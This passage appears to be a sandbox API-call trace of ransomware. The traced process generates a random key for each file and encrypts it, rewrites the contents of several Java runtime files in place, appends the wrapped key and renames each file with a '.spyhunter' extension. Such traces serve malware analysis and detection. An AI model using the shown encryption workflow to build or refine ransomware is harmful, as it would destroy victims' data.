hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7d8*=0x30) returned 1 [0125.477] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfont.properties.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.478] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja") returned 61 [0125.478] StrStrW (lpFirst="psfont.properties.ja", lpSrch=".txt") returned 0x0 [0125.478] GetProcessHeap () returned 0x2c0000 [0125.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.478] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f79c*=0xaec, lpOverlapped=0x0) returned 1 [0125.487] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff514, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.487] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xaec, lpNumberOfBytesWritten=0x57f79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f79c*=0xaec, lpOverlapped=0x0) returned 1 [0125.487] GetProcessHeap () returned 0x2c0000 [0125.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.487] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.488] WriteFile (in: hFile=0x170, lpBuffer=0x57f7dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f79c, lpOverlapped=0x0 | out: lpBuffer=0x57f7dc*, lpNumberOfBytesWritten=0x57f79c*=0x4, lpOverlapped=0x0) returned 1 [0125.488] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f79c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f79c*=0x30, lpOverlapped=0x0) returned 1 [0125.488] CloseHandle (hObject=0x170) returned 1 [0125.488] GetProcessHeap () returned 0x2c0000 [0125.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.488] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja.spyhunter") returned 71 [0125.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfont.properties.ja"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfont.properties.ja.spyhunter")) returned 1 [0125.489] GetProcessHeap () returned 0x2c0000 [0125.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.489] GetProcessHeap () returned 0x2c0000 [0125.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.489] GetProcessHeap () returned 0x2c0000 [0125.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfdf8 | out: hHeap=0x2c0000) returned 1 [0125.489] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7d8 | out: pbBuffer=0x57f7d8) returned 1 [0125.489] GetProcessHeap () returned 0x2c0000 [0125.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.490] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7d0*=0x30) returned 1 [0125.490] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\net.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.490] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties") returned 55 [0125.490] StrStrW (lpFirst="net.properties", lpSrch=".txt") returned 0x0 [0125.490] GetProcessHeap () returned 0x2c0000 [0125.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.490] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f794*=0xbfe, lpOverlapped=0x0) returned 1 [0125.505] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff402, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.506] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xbfe, lpNumberOfBytesWritten=0x57f794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f794*=0xbfe, lpOverlapped=0x0) returned 1 [0125.506] GetProcessHeap () returned 0x2c0000 [0125.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.506] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.506] WriteFile (in: hFile=0x170, lpBuffer=0x57f7d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f794, lpOverlapped=0x0 | out: lpBuffer=0x57f7d4*, lpNumberOfBytesWritten=0x57f794*=0x4, lpOverlapped=0x0) returned 1 [0125.506] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f794, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f794*=0x30, lpOverlapped=0x0) returned 1 [0125.506] CloseHandle (hObject=0x170) returned 1 [0125.506] GetProcessHeap () returned 0x2c0000 [0125.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0125.507] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties.spyhunter") returned 65 [0125.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\net.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\net.properties.spyhunter")) returned 1 [0125.510] GetProcessHeap () returned 0x2c0000 [0125.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0125.510] GetProcessHeap () returned 0x2c0000 [0125.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.510] GetProcessHeap () returned 0x2c0000 [0125.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3650 | out: hHeap=0x2c0000) returned 1 [0125.510] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7d8 | out: pbBuffer=0x57f7d8) returned 1 [0125.510] GetProcessHeap () returned 0x2c0000 [0125.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.510] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7d0*=0x30) returned 1 [0125.511] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\tzmappings"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.512] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings") returned 51 [0125.512] StrStrW (lpFirst="tzmappings", lpSrch=".txt") returned 0x0 [0125.512] GetProcessHeap () returned 0x2c0000 [0125.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.512] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f794*=0x1fca, lpOverlapped=0x0) returned 1 [0125.527] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffe036, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.527] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1fca, lpNumberOfBytesWritten=0x57f794, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f794*=0x1fca, lpOverlapped=0x0) returned 1 [0125.528] GetProcessHeap () returned 0x2c0000 [0125.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.528] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.528] WriteFile (in: hFile=0x170, lpBuffer=0x57f7d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f794, lpOverlapped=0x0 | out: lpBuffer=0x57f7d4*, lpNumberOfBytesWritten=0x57f794*=0x4, lpOverlapped=0x0) returned 1 [0125.528] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f794, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f794*=0x30, lpOverlapped=0x0) returned 1 [0125.528] CloseHandle (hObject=0x170) returned 1 [0125.528] GetProcessHeap () returned 0x2c0000 [0125.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.528] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings.spyhunter") returned 61 [0125.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\tzmappings"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\tzmappings.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\tzmappings.spyhunter")) returned 1 [0125.529] GetProcessHeap () returned 0x2c0000 [0125.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.529] GetProcessHeap () returned 0x2c0000 [0125.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.529] GetProcessHeap () returned 0x2c0000 [0125.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3e90 | out: hHeap=0x2c0000) returned 1 [0125.532] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7d0 | out: pbBuffer=0x57f7d0) returned 1 [0125.532] GetProcessHeap () returned 0x2c0000 [0125.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.533] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7c8*=0x30) returned 1 [0125.533] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\us_export_policy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.534] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar") returned 70 [0125.534] StrStrW (lpFirst="US_export_policy.jar", lpSrch=".txt") returned 0x0 [0125.534] GetProcessHeap () returned 0x2c0000 [0125.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.535] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f78c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f78c*=0x9b7, lpOverlapped=0x0) returned 1 [0125.540] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff649, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.540] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x9b7, lpNumberOfBytesWritten=0x57f78c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f78c*=0x9b7, lpOverlapped=0x0) returned 1 [0125.540] GetProcessHeap () returned 0x2c0000 [0125.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.540] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.540] WriteFile (in: hFile=0x170, lpBuffer=0x57f7cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f78c, lpOverlapped=0x0 | out: lpBuffer=0x57f7cc*, lpNumberOfBytesWritten=0x57f78c*=0x4, lpOverlapped=0x0) returned 1 [0125.541] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f78c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f78c*=0x30, lpOverlapped=0x0) returned 1 [0125.541] CloseHandle (hObject=0x170) returned 1 [0125.541] GetProcessHeap () returned 0x2c0000 [0125.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.541] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.spyhunter") returned 80 [0125.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\us_export_policy.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\US_export_policy.jar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\us_export_policy.jar.spyhunter")) returned 1 [0125.542] GetProcessHeap () returned 0x2c0000 [0125.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.542] GetProcessHeap () returned 0x2c0000 [0125.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.542] GetProcessHeap () returned 0x2c0000 [0125.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7cdb0 | out: hHeap=0x2c0000) returned 1 [0125.542] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7c8 | out: pbBuffer=0x57f7c8) returned 1 [0125.542] GetProcessHeap () returned 0x2c0000 [0125.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.542] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7c0*=0x30) returned 1 [0125.542] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\trusted.libraries" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\trusted.libraries"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.543] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\trusted.libraries") returned 67 [0125.543] StrStrW (lpFirst="trusted.libraries", lpSrch=".txt") returned 0x0 [0125.543] GetProcessHeap () returned 0x2c0000 [0125.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.543] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f784, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f784*=0x0, lpOverlapped=0x0) returned 1 [0125.543] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.543] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x57f784, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f784*=0x0, lpOverlapped=0x0) returned 1 [0125.543] GetProcessHeap () returned 0x2c0000 [0125.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.544] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.544] WriteFile (in: hFile=0x170, lpBuffer=0x57f7c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f784, lpOverlapped=0x0 | out: lpBuffer=0x57f7c4*, lpNumberOfBytesWritten=0x57f784*=0x4, lpOverlapped=0x0) returned 1 [0125.545] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f784, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f784*=0x30, lpOverlapped=0x0) returned 1 [0125.545] CloseHandle (hObject=0x170) returned 1 [0125.545] GetProcessHeap () returned 0x2c0000 [0125.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.545] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\trusted.libraries.spyhunter") returned 77 [0125.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\trusted.libraries" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\trusted.libraries"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\trusted.libraries.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\trusted.libraries.spyhunter")) returned 1 [0125.572] GetProcessHeap () returned 0x2c0000 [0125.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.572] GetProcessHeap () returned 0x2c0000 [0125.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.572] GetProcessHeap () returned 0x2c0000 [0125.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03408 | out: hHeap=0x2c0000) returned 1 [0125.573] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7c8 | out: pbBuffer=0x57f7c8) returned 1 [0125.573] GetProcessHeap () returned 0x2c0000 [0125.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.573] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7c0*=0x30) returned 1 [0125.573] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javaws.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.574] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy") returned 63 [0125.574] StrStrW (lpFirst="javaws.policy", lpSrch=".txt") returned 0x0 [0125.574] GetProcessHeap () returned 0x2c0000 [0125.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.574] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f784, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f784*=0x62, lpOverlapped=0x0) returned 1 [0125.575] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff9e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.575] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x57f784, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f784*=0x62, lpOverlapped=0x0) returned 1 [0125.575] GetProcessHeap () returned 0x2c0000 [0125.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.575] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.575] WriteFile (in: hFile=0x170, lpBuffer=0x57f7c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f784, lpOverlapped=0x0 | out: lpBuffer=0x57f7c4*, lpNumberOfBytesWritten=0x57f784*=0x4, lpOverlapped=0x0) returned 1 [0125.579] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f784, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f784*=0x30, lpOverlapped=0x0) returned 1 [0125.579] CloseHandle (hObject=0x170) returned 1 [0125.579] GetProcessHeap () returned 0x2c0000 [0125.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ef5c20 [0125.579] wnsprintfW (in: pszDest=0x2ef5c20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy.spyhunter") returned 73 [0125.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javaws.policy"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javaws.policy.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javaws.policy.spyhunter")) returned 1 [0125.580] GetProcessHeap () returned 0x2c0000 [0125.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5c20 | out: hHeap=0x2c0000) returned 1 [0125.580] GetProcessHeap () returned 0x2c0000 [0125.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0125.580] GetProcessHeap () returned 0x2c0000 [0125.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfc68 | out: hHeap=0x2c0000) returned 1 [0125.580] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f7c0 | out: pbBuffer=0x57f7c0) returned 1 [0125.580] GetProcessHeap () returned 0x2c0000 [0125.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0125.581] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f7b8*=0x30) returned 1 [0125.581] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\security\\javafx.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0125.588] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\security\\javafx.policy") returned 63 [0125.588] StrStrW (lpFirst="javafx.policy", lpSrch=".txt") returned 0x0 [0125.588] GetProcessHeap () returned 0x2c0000 [0125.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.588] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f77c*=0x9e, lpOverlapped=0x0) returned 1 [0125.589] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff62, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.589] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x9e, lpNumberOfBytesWritten=0x57f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f77c*=0x9e, lpOverlapped=0x0) returned 1 [0125.589] GetProcessHeap () returned 0x2c0000 [0125.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.589] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.589] WriteFile (in: hFile=0x16c, lpBuffer=0x57f7bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f77c, lpOverlapped=0x0 | out: lpBuffer=0x57f7bc*, lpNumberOfBytesWritten=0x57f77c*=0x4, lpOverlapped=0x0) returned 1 [0125.589] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f77c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f77c*=0x30, lpOverlapped=0x0) returned 1 [0125.590] CloseHandle (hObject=0x16c) returned 1 